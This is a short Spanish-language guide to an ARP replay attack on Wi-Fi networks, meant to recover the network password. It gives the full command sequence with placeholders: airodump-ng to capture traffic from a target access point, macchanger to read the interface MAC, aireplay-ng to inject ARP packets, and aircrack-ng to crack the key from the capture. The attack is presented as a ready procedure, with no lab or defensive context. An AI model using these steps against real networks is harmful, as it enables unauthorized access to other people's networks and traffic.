ARP Replay Attack

Ataque usado para la obtención de contraseña. Se inyectan paquetes ARP a la red para forzar al AP a retransmitirlos. Esto genera tráfico con los suficientes IVs como para descifrar la contraseña.


  • Capturar tráfico con Airodump-ng

sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
  • En paralelo, ejecutar MACchanger para conocer la dirección MAC de la interfaz de red utilizada

macchanger --show <wifi_interface>
  • Ejecutar ataque arpreplay con Aireplay-ng

sudo aireplay-ng --arpreplay –x 1000 –n 1000 –b <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
  • Crackear contraseña con Aircrack-ng desde fichero con tráfico capturado en Airodump-ng

sudo aircrack-ng –b <MAC_AP> traffic_file.cap